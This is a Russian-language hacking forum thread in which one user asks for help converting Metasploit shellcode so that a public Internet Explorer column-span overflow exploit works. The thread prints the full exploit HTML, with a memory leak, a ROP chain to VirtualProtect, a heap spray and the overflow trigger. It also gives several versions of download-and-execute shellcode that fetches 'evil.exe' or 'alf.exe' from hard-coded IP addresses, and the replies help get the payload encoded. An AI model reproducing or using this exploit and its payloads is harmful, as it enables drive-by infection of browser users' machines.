преобразование PoC Exploit

Discussion in 'Уязвимости' started by zero_day, 19 Feb 2013.

  1. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Имеется PoC Exploit
    http://www.exploit-db.com/exploits/24017/

    И cгенерирован shell в metasploit

    Code:
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"+
    "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52"+
    "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"+
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"+
    "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52"+
    "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"+
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"+
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"+
    "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"+
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b"+
    "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"+
    "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"+
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
    "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"+
    "\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"+
    "\x77\x69\x6e\x69\x89\xe6\x54\x68\x4c\x77"+
    "\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57"+
    "\x56\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x63"+
    "\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68"+
    "\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f"+
    "\xc6\xff\xd5\xeb\x4f\x59\x31\xd2\x52\x68"+
    "\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50"+
    "\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a"+
    "\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"+
    "\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86"+
    "\xff\xd5\x31\xff\x57\x57\x57\x57\x56\x68"+
    "\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1d"+
    "\x4b\x0f\x84\x7a\x00\x00\x00\xeb\xd1\xe9"+
    "\x89\x00\x00\x00\xe8\xac\xff\xff\xff\x2f"+
    "\x65\x76\x69\x6c\x2e\x65\x78\x65\x00\xeb"+
    "\x6b\x31\xc0\x5f\x50\x6a\x02\x6a\x02\x50"+
    "\x6a\x02\x6a\x02\x57\x68\xda\xf6\xda\x4f"+
    "\xff\xd5\x93\x31\xc0\x66\xb8\x04\x03\x29"+
    "\xc4\x54\x8d\x4c\x24\x08\x31\xc0\xb4\x03"+
    "\x50\x51\x56\x68\x12\x96\x89\xe2\xff\xd5"+
    "\x85\xc0\x74\x2d\x58\x85\xc0\x74\x16\x6a"+
    "\x00\x54\x50\x8d\x44\x24\x0c\x50\x53\x68"+
    "\x2d\x57\xae\x5b\xff\xd5\x83\xec\x04\xeb"+
    "\xce\x53\x68\xc6\x96\x87\x52\xff\xd5\x6a"+
    "\x00\x57\x68\x31\x8b\x6f\x87\xff\xd5\x6a"+
    "\x00\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\x90"+
    "\xff\xff\xff\x61\x6c\x66\x2e\x65\x78\x65"+
    "\x00\xe8\x0a\xff\xff\xff\x31\x39\x32\x2e"+
    "\x31\x36\x38\x2e\x30\x2e\x35\x00"
    Проблема в том что при замене оригинального шелл кода на свой эксплоит не работает.
    Кто поможет идеями по данному поводу?
     
    #1 zero_day, 19 Feb 2013
    Last edited: 19 Feb 2013
  2. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Значит не правильно заменяешь. Страницу в студию (с новым шелкодом).
     
  3. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Code:
    <html>
    <body>
    <div id="evil"></div>
    <table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
    <script language='javascript'>
     
    function strtoint(str) {
        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
    }
     
    var free = "EEEE";
    while ( free.length < 500 ) free += free;
     
    var string1 = "AAAA";
    while ( string1.length < 500 ) string1 += string1;
     
    var string2 = "BBBB";
    while ( string2.length < 500 ) string2 += string2;
     
    var fr = new Array();
    var al = new Array();
    var bl = new Array();
     
    var div_container = document.getElementById("evil");
    div_container.style.cssText = "display:none";
     
    for (var i=0; i < 500; i+=2) {
        fr[i] = free.substring(0, (0x100-6)/2);
        al[i] = string1.substring(0, (0x100-6)/2);
        bl[i] = string2.substring(0, (0x100-6)/2);
        var obj = document.createElement("button");
        div_container.appendChild(obj);
    }
     
    for (var i=200; i<500; i+=2 ) {
        fr[i] = null;
        CollectGarbage();
    }
     
    function heapspray(cbuttonlayout) {
        CollectGarbage();
        var rop = cbuttonlayout + 4161; // RET
        var rop = rop.toString(16);
        var rop1 = rop.substring(4,8);
        var rop2 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 11360; // POP EBP
        var rop = rop.toString(16);
        var rop3 = rop.substring(4,8);
        var rop4 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
        var rop = rop.toString(16);
        var rop5 = rop.substring(4,8);
        var rop6 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 12377; // POP EBX
        var rop = rop.toString(16);
        var rop7 = rop.substring(4,8);
        var rop8 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 642768; // POP EDX
        var rop = rop.toString(16);
        var rop9 = rop.substring(4,8);
        var rop10 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 12201; // POP ECX --> Changed
        var rop = rop.toString(16);
        var rop11 = rop.substring(4,8);
        var rop12 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 5504544; // Writable location
        var rop = rop.toString(16);
        var writable1 = rop.substring(4,8);
        var writable2 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 12462; // POP EDI
        var rop = rop.toString(16);
        var rop13 = rop.substring(4,8);
        var rop14 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 12043; // POP ESI --> changed
        var rop = rop.toString(16);
        var rop15 = rop.substring(4,8);
        var rop16 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 63776; // JMP EAX
        var rop = rop.toString(16);
        var jmpeax1 = rop.substring(4,8);
        var jmpeax2 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 85751; // POP EAX
        var rop = rop.toString(16);
        var rop17 = rop.substring(4,8);
        var rop18 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 4936; // VirtualProtect()
        var rop = rop.toString(16);
        var vp1 = rop.substring(4,8);
        var vp2 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
        var rop = rop.toString(16);
        var rop19 = rop.substring(4,8);
        var rop20 = rop.substring(0,4); // } RET
     
        var rop = cbuttonlayout + 234657; // PUSHAD
        var rop = rop.toString(16);
        var rop21 = rop.substring(4,8);
        var rop22 = rop.substring(0,4); // } RET
     
     
        var rop = cbuttonlayout + 408958; // PUSH ESP
        var rop = rop.toString(16);
        var rop23 = rop.substring(4,8);
        var rop24 = rop.substring(0,4); // } RET
     
        var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET
        shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
        shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP
        shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
        shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
        shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
        shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
        shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
        shellcode+= unescape("%u0040%u0000"); // 0x00000040
        shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
        shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
        shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
        shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
        shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
        shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
        shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
        shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
        shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
        shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
        shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
        shellcode+= unescape("%u9090%u9090"); // crap
        shellcode+= unescape("%u9090%u9090"); // crap
     
    
        shellcode+= [COLOR=DarkGreen]"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"+
    "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52"+
    "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"+
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"+
    "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52"+
    "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"+
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"+
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"+
    "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"+
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b"+
    "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"+
    "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"+
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
    "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"+
    "\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"+
    "\x77\x69\x6e\x69\x89\xe6\x54\x68\x4c\x77"+
    "\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57"+
    "\x56\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x63"+
    "\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68"+
    "\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f"+
    "\xc6\xff\xd5\xeb\x4f\x59\x31\xd2\x52\x68"+
    "\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50"+
    "\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a"+
    "\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"+
    "\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86"+
    "\xff\xd5\x31\xff\x57\x57\x57\x57\x56\x68"+
    "\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1d"+
    "\x4b\x0f\x84\x7a\x00\x00\x00\xeb\xd1\xe9"+
    "\x89\x00\x00\x00\xe8\xac\xff\xff\xff\x2f"+
    "\x65\x76\x69\x6c\x2e\x65\x78\x65\x00\xeb"+
    "\x6b\x31\xc0\x5f\x50\x6a\x02\x6a\x02\x50"+
    "\x6a\x02\x6a\x02\x57\x68\xda\xf6\xda\x4f"+
    "\xff\xd5\x93\x31\xc0\x66\xb8\x04\x03\x29"+
    "\xc4\x54\x8d\x4c\x24\x08\x31\xc0\xb4\x03"+
    "\x50\x51\x56\x68\x12\x96\x89\xe2\xff\xd5"+
    "\x85\xc0\x74\x2d\x58\x85\xc0\x74\x16\x6a"+
    "\x00\x54\x50\x8d\x44\x24\x0c\x50\x53\x68"+
    "\x2d\x57\xae\x5b\xff\xd5\x83\xec\x04\xeb"+
    "\xce\x53\x68\xc6\x96\x87\x52\xff\xd5\x6a"+
    "\x00\x57\x68\x31\x8b\x6f\x87\xff\xd5\x6a"+
    "\x00\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\x90"+
    "\xff\xff\xff\x61\x6c\x66\x2e\x65\x78\x65"+
    "\x00\xe8\x0a\xff\xff\xff\x31\x39\x32\x2e"+
    "\x31\x36\x38\x2e\x30\x2e\x35\x00";[/COLOR]
     
     
     
        while (shellcode.length < 100000)
            shellcode = shellcode + shellcode;
     
        var onemeg = shellcode.substr(0, 64*1024/2);
     
        for (i=0; i<14; i++) {
            onemeg += shellcode.substr(0, 64*1024/2);
        }
     
        onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
     
        var spray = new Array();
     
        for (i=0; i<100; i++) {
            spray[i] = onemeg.substr(0, onemeg.length);
        }
    }
     
    function leak(){
        var leak_col = document.getElementById("132");
        leak_col.width = "41";
        leak_col.span = "19";
    }
     
    function get_leak() {
        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
        str_addr = str_addr - 1410704;
        setTimeout(function(){heapspray(str_addr)}, 200);  
    }
     
    function trigger_overflow(){
        var evil_col = document.getElementById("132");
        evil_col.width = "1178993";
        evil_col.span = "44";
    }
     
    setTimeout(function(){leak()}, 300);
    setTimeout(function(){get_leak()},700);
    //setTimeout(function(){heapspray()}, 900);
    setTimeout(function(){trigger_overflow()}, 1200);
     
    </script>
    </body>
    </html>
     
    #3 zero_day, 19 Feb 2013
    Last edited: 19 Feb 2013
  4. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    А кто шелкод будет в unescape переводить?
     
  5. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Он 16-ричный код напрямую не подхватывает?
     
    #5 zero_day, 19 Feb 2013
    Last edited: 19 Feb 2013
  6. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    нет, не подхватывает
     
  7. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Перевожу шел код в escape
    Code:
     <script language='javascript'>
    var shellcode = escape('');
    console.log(shellcode);
    </script> 
    На выходе получается вот такое
    Code:
     %FC%E8%89%00%00%00%60%89%E51%D2d%8BR0%8BR%0C%8BR%14%8Br%28%0F%B7J%261%FF1%C0%AC%3Ca%7C%02%2C%20%C1%CF%0D%01%C7%E2%F0RW%8BR%10%8BB%3C%01%D0%8B@x%85%C0tJ%01%D0P%8BH%18%8BX%20%01%D3%E3%3CI%8B4%8B%01%D61%FF1%C0%AC%C1%CF%0D%01%C78%E0u%F4%03%7D%F8%3B%7D%24u%E2X%8BX%24%01%D3f%8B%0CK%8BX%1C%01%D3%8B%04%8B%01%D0%89D%24%24%5B%5BaYZQ%FF%E0X_Z%8B%12%EB%86%5Dhnet%00hwini%89%E6ThLw%26%07%FF%D51%FFWWWWVh%3AVy%A7%FF%D5%EBc%5B1%C9QQj%03QQh%BB%01%00%00SPhW%89%9F%C6%FF%D5%EBOY1%D2Rh%002%A0%84RRRQRPh%EBU.%3B%FF%D5%89%C6j%10%5Bh%803%00%00%89%E0j%04Pj%1FVhuF%9E%86%FF%D51%FFWWWWVh-%06%18%7B%FF%D5%85%C0u%1DK%0F%84z%00%00%00%EB%D1%E9%89%00%00%00%E8%AC%FF%FF%FF/evil.exe%00%EBk1%C0_Pj%02j%02Pj%02j%02Wh%DA%F6%DAO%FF%D5%931%C0f%B8%04%03%29%C4T%8DL%24%081%C0%B4%03PQVh%12%96%89%E2%FF%D5%85%C0t-X%85%C0t%16j%00TP%8DD%24%0CPSh-W%AE%5B%FF%D5%83%EC%04%EB%CESh%C6%96%87R%FF%D5j%00Wh1%8Bo%87%FF%D5j%00h%F0%B5%A2V%FF%D5%E8%90%FF%FF%FFalf.exe%00%E8%0A%FF%FF%FF192.168.0.5%00
    В чем ошибка?
     
  8. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Зачем изобретать велосипед?

    Скопирую свой шеллкод в Hex редактор (например WinHex) и сохрани в файл, а затем просто, используя online сервисы, конвертируй в escape.
     
  9. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Вот в том и проблема, что не найду ни одного адекватного online сервиса.
     
  10. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Выложи свой файл куда-нить, чтобы скачать можно было. Я тебе переведу.
     
  11. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Его 16-ричный вид:
    Code:
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"+
    "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52"+
    "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"+
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"+
    "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52"+
    "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"+
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"+
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"+
    "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"+
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b"+
    "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"+
    "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"+
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
    "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"+
    "\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"+
    "\x77\x69\x6e\x69\x89\xe6\x54\x68\x4c\x77"+
    "\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57"+
    "\x56\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x60"+
    "\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x6a"+
    "\x50\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5"+
    "\xeb\x4f\x59\x31\xd2\x52\x68\x00\x32\x20"+
    "\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55"+
    "\x2e\x3b\xff\xd5\x89\xc6\x6a\x10\x5b\x68"+
    "\x80\x33\x00\x00\x89\xe0\x6a\x04\x50\x6a"+
    "\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31"+
    "\xff\x57\x57\x57\x57\x56\x68\x2d\x06\x18"+
    "\x7b\xff\xd5\x85\xc0\x75\x1c\x4b\x0f\x84"+
    "\x79\x00\x00\x00\xeb\xd1\xe9\x88\x00\x00"+
    "\x00\xe8\xac\xff\xff\xff\x2f\x61\x6c\x66"+
    "\x2e\x65\x78\x65\x00\xeb\x6b\x31\xc0\x5f"+
    "\x50\x6a\x02\x6a\x02\x50\x6a\x02\x6a\x02"+
    "\x57\x68\xda\xf6\xda\x4f\xff\xd5\x93\x31"+
    "\xc0\x66\xb8\x04\x03\x29\xc4\x54\x8d\x4c"+
    "\x24\x08\x31\xc0\xb4\x03\x50\x51\x56\x68"+
    "\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\x2d"+
    "\x58\x85\xc0\x74\x16\x6a\x00\x54\x50\x8d"+
    "\x44\x24\x0c\x50\x53\x68\x2d\x57\xae\x5b"+
    "\xff\xd5\x83\xec\x04\xeb\xce\x53\x68\xc6"+
    "\x96\x87\x52\xff\xd5\x6a\x00\x57\x68\x31"+
    "\x8b\x6f\x87\xff\xd5\x6a\x00\x68\xf0\xb5"+
    "\xa2\x56\xff\xd5\xe8\x90\xff\xff\xff\x61"+
    "\x6c\x66\x2e\x65\x78\x65\x00\xe8\x0e\xff"+
    "\xff\xff\x31\x39\x35\x2e\x32\x31\x31\x2e"+
    "\x32\x32\x35\x2e\x31\x30\x00"
     
    #11 zero_day, 25 Feb 2013
    Last edited: 25 Feb 2013
  12. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Мне нужен файл, а не вырезка из кода.
    P.S. Если ты хочешь, чтобы твой код заработал, необходимо иногда напрягаться. Всё за тебя здесь делать никто не будет.
     
  13. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    http://webfile.ru/6399076
    И если не сложно, сможешь дать небольшие пояснения чем и как преобразовывал.
     
    #13 zero_day, 26 Feb 2013
    Last edited: 26 Feb 2013
  14. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Что это такое? Я просил hex файл
     
    #14 RoksHD, 26 Feb 2013
    Last edited: 27 Feb 2013
  15. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    http://webfile.ru/6411000
    HEX-файл
     
  16. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Не очень понимаю почему он такой здоровый, но ладно, пусть. Держи: http://webfile.ru/6411864
     
  17. zero_day

    zero_day New Member

    Joined:
    9 Nov 2012
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Премного благодарен.

    И можно пояснить как это было преобразовано, охота самому разобраться.
     
    #17 zero_day, 5 Mar 2013
    Last edited: 5 Mar 2013
Loading...
Similar Threads - преобразование Exploit
  1. Sensoft
    Replies:
    3
    Views:
    2,372
  2. madik
    Replies:
    0
    Views:
    1,058
  3. zloy_fantom
    Replies:
    1
    Views:
    1,594